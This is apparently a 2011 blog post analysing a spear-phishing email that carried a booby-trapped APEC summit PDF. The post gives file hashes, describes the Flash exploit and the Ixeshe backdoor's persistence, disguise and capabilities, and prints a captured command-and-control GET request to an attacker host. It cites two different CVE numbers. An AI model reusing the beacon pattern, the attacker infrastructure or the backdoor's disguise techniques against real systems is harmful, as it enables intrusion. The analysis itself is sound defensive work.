APEC SpearPhish

I was asked (and given permission) to publish this…..

OVERVIEW

A suspicious email was received on 10/26/2011 and targeted a single, key individual in the organization. The sender appeared to be from a Hawaii-based real estate company.

The email was identified as a spear-phish as it contained a malicious PDF file attachment:

When the PDF file is opened, it looks like this:

The email header shows that the email originated from Google Mail and was not spoofed. The purported sender is “Christy Serrato” who has been linked to other targeted spear-phish attacks in the past as seen below. Security researchers who analyzed these attacks have attributed them to China.

The PDF file attachment contains a Flash object that exploits an Adobe Flash Player vulnerability. If successful, malware is then installed on the user’s computer without any warning. Here’s a description of the vulnerability:

CVE-2011-0609 – Unspecified vulnerability in Adobe Flash Player 10.2.154.13 and earlier on Windows, Mac OS X, Linux, and Solaris; 10.1.106.16 and earlier on Android; Adobe AIR 2.5.1 and earlier; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader and Acrobat 9.x through 9.4.2 and 10.x through 10.0.1 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content, as demonstrated by a .swf file embedded in an Excel spreadsheet, and as exploited in the wild in March 2011.

The malicious PDF file, when scanned against 43 different anti-virus products, can only be detected by 8 of them:

The malware that runs on the user’s computer is a backdoor program. This program tries to communicate with a remote website which gives the remote attacker the ability to perform the following actions on the affected computer:

  • Download/upload files
  • Execute arbitrary files
  • Execute remote commands
  • Delete arbitrary files
  • Terminate processes
  • List running processes
  • List folders for files
  • Sleeps the computer for a specified time
  • May install modified copy of “cmd.exe” with the name specified by the remote attacker

The backdoor program, when scanned against 43 different anti-virus products, can only be detected by 9 of them:

The web server that the backdoor program communicates with, dot.faawan.com (216.134.230.120), appears to be located in Arkansas, USA and has a clean reputation, however, all of the name servers supporting the domain are located in various cities in China.

Sequence of events:

TECHNICAL DETAILS

The email originated from Google Mail and was not forged:

The PDF file details and results of a VirusTotal scan:

File: The Future Redefined-2011 APEC CEO Summit.pdf
MD5: 3d91d9df315ffeb9bb1c774452b3114b
Size: 433140
VirusTotal Results: 8 of 43 (18.6%)

The PDF file contains an embedded Flash file:

The Flash file details and results of a VirusTotal scan:

File: stream.swf
MD5: a9fa49ea3b11baecfc4a593607faa37b
Size: 15914
VirusTotal Results: 8 of 43 (18.6%)

The decompiled Flash file shows the CVE-2011-0611 exploit code:

When the PDF file is opened, the Flash file containing the exploit code executes and drops two files onto the computer in the “%userprofile%\local settings\temp” folder.

The first file is a blank PDF file called “The Future Redefined-2011 APEC CEO Summit.pdf” that automatically opens when Acrobat crashes due to the exploit.

Here we can see the PDF maker of this file:

The second dropped file is an executable called “A3DUtility.exe”. Here are details of the program and results from VirusTotal:

File: A3DUtility.exe
MD5: 4b873858b58be4b47013545420f27759
Size: 385024
VirusTotal Results: 9 of 43 (20.9%)

The program is referenced as “Ixeshe”, variant “E” by Microsoft.

Backdoor: Win32/Ixeshe.E
Report Published: May 13, 2011
Summary: Ixeshe.E is a backdoor trojan that allows remote access and control of a computer. In the wild, this trojan is known to be dropped by malicious SWF files.

The program’s file attribute is set to hidden. A shortcut is created in the Startup folder that launches this program automatically and silently during every startup.

The backdoor program was made to look like an existing, legitimate component of Adobe Acrobat.

The backdoor program can be seen running in Task Manager. When the program runs, it attempts to communicate with a remote server on port 443 then waits for instructions. Port 443 is normally used with the SSL protocol but in this case, no encryption is used (the URL parameters do appear to be encoded).

GET /AWS28019.jsp?PSq22oB5gr5oQvDwTsnJgrl8UaZSxRVYPsUcGjF2GjZoPr/qgspwPrVFPaZN/SnrxRpqGjZFTrK7=oH32b5wPI27=hTL=aYdQ4vV=M9Bph7k=N2BQhvo0aLKQipFP8yMPs7r HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: dot.faawan.com

If the web page is not found, the program retries a few more times and then increments the numeric portion of the web page name and tries again. The program systematically tries to find a valid web page performing several HTTP GET requests per second, presumably until a web page is found and the proper response is received.

Information about the host names:

The reputation of the remote server at 216.134.230.120:

Posted on: 11/09/2011